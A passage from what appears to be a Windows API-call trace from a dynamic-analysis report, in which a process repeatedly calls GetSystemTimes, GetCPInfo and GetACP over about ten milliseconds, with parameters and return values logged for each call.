lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.369] GetACP () returned 0x4e4 [0130.369] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.369] GetACP () returned 0x4e4 [0130.369] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.369] GetACP () returned 0x4e4 [0130.369] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.369] GetACP () returned 0x4e4 [0130.369] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.369] GetACP () returned 0x4e4 [0130.369] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.369] GetACP () returned 0x4e4 [0130.369] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.370] GetACP () returned 0x4e4 [0130.370] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.370] GetACP () returned 0x4e4 [0130.370] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.370] GetACP () returned 0x4e4 [0130.370] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.370] GetACP () returned 0x4e4 [0130.370] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.370] GetACP () returned 0x4e4 [0130.370] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.370] GetACP () returned 0x4e4 [0130.370] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.370] GetACP () returned 0x4e4 [0130.370] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.371] GetACP () returned 0x4e4 [0130.371] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.371] GetACP () returned 0x4e4 [0130.371] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.371] GetACP () returned 0x4e4 [0130.371] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.371] GetACP () returned 0x4e4 [0130.371] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.371] GetACP () returned 0x4e4 [0130.371] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.372] GetACP () returned 0x4e4 [0130.372] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.372] GetACP () returned 0x4e4 [0130.372] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.372] GetACP () returned 0x4e4 [0130.372] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.372] GetACP () returned 0x4e4 [0130.372] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.372] GetACP () returned 0x4e4 [0130.372] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.372] GetACP () returned 0x4e4 [0130.372] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.373] GetACP () returned 0x4e4 [0130.373] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.373] GetACP () returned 0x4e4 [0130.373] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.373] GetACP () returned 0x4e4 [0130.373] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.373] GetACP () returned 0x4e4 [0130.373] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.373] GetACP () returned 0x4e4 [0130.373] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.373] GetACP () returned 0x4e4 [0130.373] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.374] GetACP () returned 0x4e4 [0130.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.374] GetACP () returned 0x4e4 [0130.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.374] GetACP () returned 0x4e4 [0130.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.374] GetACP () returned 0x4e4 [0130.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.374] GetACP () returned 0x4e4 [0130.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.374] GetACP () returned 0x4e4 [0130.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.374] GetACP () returned 0x4e4 [0130.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.375] GetACP () returned 0x4e4 [0130.375] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.375] GetACP () returned 0x4e4 [0130.375] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.375] GetACP () returned 0x4e4 [0130.375] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.375] GetACP () returned 0x4e4 [0130.375] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.375] GetACP () returned 0x4e4 [0130.375] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.375] GetACP () returned 0x4e4 [0130.375] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.375] GetACP () returned 0x4e4 [0130.376] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.376] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.376] GetACP () returned 0x4e4 [0130.376] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.376] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.376] GetACP () returned 0x4e4 [0130.376] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.376] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.376] GetACP () returned 0x4e4 [0130.376] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.376] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.376] GetACP () returned 0x4e4 [0130.376] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.376] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.376] GetACP () returned 0x4e4 [0130.376] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.376] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.376] GetACP () returned 0x4e4 [0130.376] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.376] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.377] GetACP () returned 0x4e4 [0130.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.377] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.377] GetACP () returned 0x4e4 [0130.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.377] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.377] GetACP () returned 0x4e4 [0130.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.377] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.377] GetACP () returned 0x4e4 [0130.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.377] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.377] GetACP () returned 0x4e4 [0130.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.377] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.377] GetACP () returned 0x4e4 [0130.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.377] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.377] GetACP () returned 0x4e4 [0130.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.378] GetACP () returned 0x4e4 [0130.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.378] GetACP () returned 0x4e4 [0130.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.378] GetACP () returned 0x4e4 [0130.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.378] GetACP () returned 0x4e4 [0130.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.378] GetACP () returned 0x4e4 [0130.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.378] GetACP () returned 0x4e4 [0130.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.378] GetACP () returned 0x4e4 [0130.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.379] GetACP () returned 0x4e4 [0130.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.379] GetACP () returned 0x4e4 [0130.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.379] GetACP () returned 0x4e4 [0130.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.379] GetACP () returned 0x4e4 [0130.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.379] GetACP () returned 0x4e4 [0130.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.379] GetACP () returned 0x4e4 [0130.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.380] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.380] GetACP () returned 0x4e4 [0130.380] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.380] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.380] GetACP () returned 0x4e4 [0130.380] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.380] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.380] GetACP () returned 0x4e4 [0130.380] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.380] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.380] GetACP () returned 0x4e4 [0130.380] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.380] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.380] GetACP () returned 0x4e4 [0130.380] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, 